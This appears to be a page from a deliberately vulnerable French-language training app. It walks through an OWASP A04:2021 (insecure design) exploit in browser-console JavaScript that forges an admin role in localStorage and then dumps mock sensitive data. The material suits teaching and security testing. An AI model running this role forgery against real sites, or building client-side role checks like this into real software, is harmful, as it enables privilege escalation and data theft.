OWASP A04:2021 - Guide d'exploitation

⚠️ Démonstration de vulnérabilités

Cette page démontre des vulnérabilités critiques - Ne pas utiliser en production

Connexion

1Examiner localStorage

console.log({ currentUser: localStorage.getItem("currentUser"), adminPanelVisible: localStorage.getItem("adminPanelVisible") });

2Injecter accès admin

localStorage.setItem("currentUser", JSON.stringify({ username: "hacker", role: "admin" })); localStorage.setItem("adminPanelVisible", "true"); location.reload();

3Accéder aux données

fetchSensitiveData(); console.log(mockDatabase.sensitiveData);

Manipulation du localStorage